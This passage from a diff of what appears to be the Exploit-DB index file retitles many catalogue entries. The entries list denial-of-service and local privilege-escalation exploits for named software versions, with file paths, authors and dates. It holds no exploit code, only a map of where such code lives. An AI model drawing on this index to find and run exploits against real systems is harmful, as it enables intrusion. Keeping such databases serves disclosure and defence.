AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 -39923,platforms/osx/dos/39923.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 -39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 -39925,platforms/osx/dos/39925.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 -39926,platforms/osx/dos/39926.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 +39922,platforms/osx/dos/39922.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 +39923,platforms/osx/dos/39923.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 +39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 +39925,platforms/osx/dos/39925.c,"Apple Mac OSX Kernel - NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 +39926,platforms/osx/dos/39926.c,"Apple Mac OSX Kernel - Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 @@ -5262,7 +5264,7 @@ id,file,description,date,author,platform,type,port 40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0 40649,platforms/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos,0 40652,platforms/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0 -40654,platforms/multiple/dos/40654.txt,"Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0 +40654,platforms/multiple/dos/40654.txt,"Apple OS X/iOS - 'mach_ports_register' Multiple Memory Safety Exploits",2016-10-31,"Google Security Research",multiple,dos,0 40656,platforms/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos,0 40657,platforms/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos,0 40658,platforms/windows/dos/40658.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000194",2016-10-31,"Google Security Research",windows,dos,0 @@ -5290,7 +5292,7 @@ id,file,description,date,author,platform,type,port 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - 'CHttp­Header­Parser::Parse­Status­Line' Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 11/10/9 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 -40762,platforms/linux/dos/40762.c,"Linux Kernel 3.10.0-327/4.8.0-22 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 +40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0 40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0 @@ -5477,12 +5479,12 @@ id,file,description,date,author,platform,type,port 41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0 -42088,platforms/windows/dos/42088.txt,"Microsoft MsMpEng - Remotely Exploitable Use-After-Free due to Design Issue in GC Engine",2017-05-30,"Google Security Research",windows,dos,0 +42088,platforms/windows/dos/42088.txt,"Microsoft MsMpEng - Remote Use-After-Free Due to Design Issue in GC Engine",2017-05-30,"Google Security Research",windows,dos,0 41851,platforms/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,windows,dos,0 41867,platforms/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0 41868,platforms/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0 41869,platforms/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",multiple,dos,0 -41879,platforms/windows/dos/41879.txt,"Microsoft Windows Kernel - 'win32k.sys' Multiple Issues 'NtGdiGetDIBitsInternal' System Call",2017-04-13,"Google Security Research",windows,dos,0 +41879,platforms/windows/dos/41879.txt,"Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call",2017-04-13,"Google Security Research",windows,dos,0 41880,platforms/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos,0 41891,platforms/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution Scanner (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",windows,dos,445 41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0 @@ -5741,7 +5743,7 @@ id,file,description,date,author,platform,type,port 29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0 31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 -40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 +40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - '/usr/mail' Local Exploit",2003-06-10,anonymous,linux,local,0 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass Exploit",2003-07-09,"Caua Moura Prado",windows,local,0 71,platforms/linux/local/71.c,"XGalaga 2.0.34 (RedHat 9.0) - Local Game Exploit",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b (RedHat 9.0) - Local Game Exploit",2003-08-01,brahma,linux,local,0 @@ -5770,7 +5772,7 @@ id,file,description,date,author,platform,type,port 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 -182,platforms/linux/local/182.sh,"RedHat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 +182,platforms/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Privilege Escalation",2000-11-16,anonymous,linux,local,0 183,platforms/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,linux,local,0 184,platforms/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Exploit (Perl)",2000-11-16,Tlabs,linux,local,0 186,platforms/linux/local/186.pl,"xsplumber - 'strcpy()' Buffer Overflow",2000-11-17,vade79,linux,local,0 @@ -5781,7 +5783,7 @@ id,file,description,date,author,platform,type,port 202,platforms/bsd/local/202.c,"BSDi 3.0/4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0 -206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0 +206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Privilege Escalation",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0 210,platforms/solaris/local/210.c,"Solaris locale - Format Strings 'noexec stack' Exploit",2000-11-30,warning3,solaris,local,0 @@ -5792,18 +5794,18 @@ id,file,description,date,author,platform,type,port 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow",2000-12-04,"Cody Tubbs",linux,local,0 221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 -229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Exploit",2000-12-15,zorgon,linux,local,0 -231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 +229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Buffer Overflow",2000-12-15,zorgon,linux,local,0 +231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Local Message Read",2000-12-15,mat,linux,local,0 243,platforms/bsd/local/243.c,"BSD chpass - 'pw_error(3)' Privilege Escalation",2001-01-12,caddis,bsd,local,0 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - '/bin/cu' Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,solaris,local,0 -252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 +252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Overflow",2001-01-15,teleh0r,linux,local,0 255,platforms/linux/local/255.pl,"RedHat 6.1 man - 'egid 15' Local Exploit",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 -258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploit",2001-01-25,krochos,linux,local,0 +258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local,0 @@ -5821,7 +5823,7 @@ id,file,description,date,author,platform,type,port 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 -320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0 +320,platforms/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0 325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 @@ -5855,7 +5857,7 @@ id,file,description,date,author,platform,type,port 396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0 -411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 +411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Privilege Escalation",2001-01-01,sd,linux,local,0 417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 @@ -6044,7 +6046,7 @@ id,file,description,date,author,platform,type,port 1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - 'Filename' Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 -1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 +1944,platforms/windows/local/1944.c,"Microsoft Excel - Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local,0 1962,platforms/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",osx,local,0 1973,platforms/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local,0 @@ -6133,7 +6135,7 @@ id,file,description,date,author,platform,type,port 3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local,0 3219,platforms/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Privilege Escalation",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 -3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 +3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Code Execution",2007-02-03,xCuter,windows,local,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 @@ -6217,8 +6219,8 @@ id,file,description,date,author,platform,type,port 4204,platforms/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,windows,local,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,windows,local,0 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 -4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 -4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 +4231,platforms/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 +4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP 'gets()' Privilege Escalation",2007-07-27,qaaz,aix,local,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 @@ -6544,7 +6546,7 @@ id,file,description,date,author,platform,type,port 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local,0 9305,platforms/windows/local/9305.txt,"EPSON Status Monitor 3 - Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local,0 -9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc - MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 +9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local,0 9343,platforms/windows/local/9343.pl,"Mediacoder 0.6.2.4275 - '.lst' Stack Buffer Overflow",2009-08-03,SkuLL-HackeR,windows,local,0 @@ -6689,7 +6691,7 @@ id,file,description,date,author,platform,type,port 10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 -10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0 +10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Buffer Overflow",2009-12-10,"Vinod Sharma",windows,local,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Stack Overflow",2009-12-14,"Vinod Sharma",windows,local,0 @@ -6703,9 +6705,9 @@ id,file,description,date,author,platform,type,port 10577,platforms/windows/local/10577.pl,"PlayMeNow - '.M3U' Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow - '.m3u' Universal XP Buffer Overflow (SEH)",2009-12-22,"ThE g0bL!N",windows,local,0 -10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Exploit",2009-12-22,d3b4g,windows,local,0 +10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Overflow",2009-12-22,d3b4g,windows,local,0 10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18 < 2.6.18-20 - Privilege Escalation",2009-12-23,DigitALL,linux,local,0 -10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat - Exploit",2009-12-23,"Ahmed Obied",windows,local,0 +10618,platforms/windows/local/10618.py,"Adobe Reader / Acrobat - '.PDF' File Overflow",2009-12-23,"Ahmed Obied",windows,local,0 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,windows,local,0 10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Buffer Overflow",2009-12-23,dijital1,windows,local,0 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (Windows XP SP3) - '.pls' Stack Buffer Overflow",2009-12-24,d3b4g,windows,local,0 @@ -6715,14 +6717,14 @@ id,file,description,date,author,platform,type,port 14158,platforms/windows/local/14158.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.m3u' Buffer Overflow",2010-07-01,Madjix,windows,local,0 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow",2009-12-27,mr_me,windows,local,0 -10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0 +10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack Buffer Overflow",2009-12-28,corelanc0d3r,windows,local,0 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0 -10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0 +10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Overflow (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 @@ -6749,7 +6751,7 @@ id,file,description,date,author,platform,type,port 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 -11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0 +11267,platforms/windows/local/11267.py,"Winamp 5.572 - Overflow (SEH)",2010-01-26,TecR0c,windows,local,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - Password field Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 @@ -6799,14 +6801,14 @@ id,file,description,date,author,platform,type,port 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 -12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Exploit (SEH)",2010-04-03,"Lincoln & corelanc0d3r",windows,local,0 +12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Overflow (SEH)",2010-04-03,"Lincoln & corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0 12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln & corelanc0d3r",windows,local,0 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 -12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 -12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 +12103,platforms/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,multiple,local,0 +12130,platforms/linux/local/12130.py,"ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer 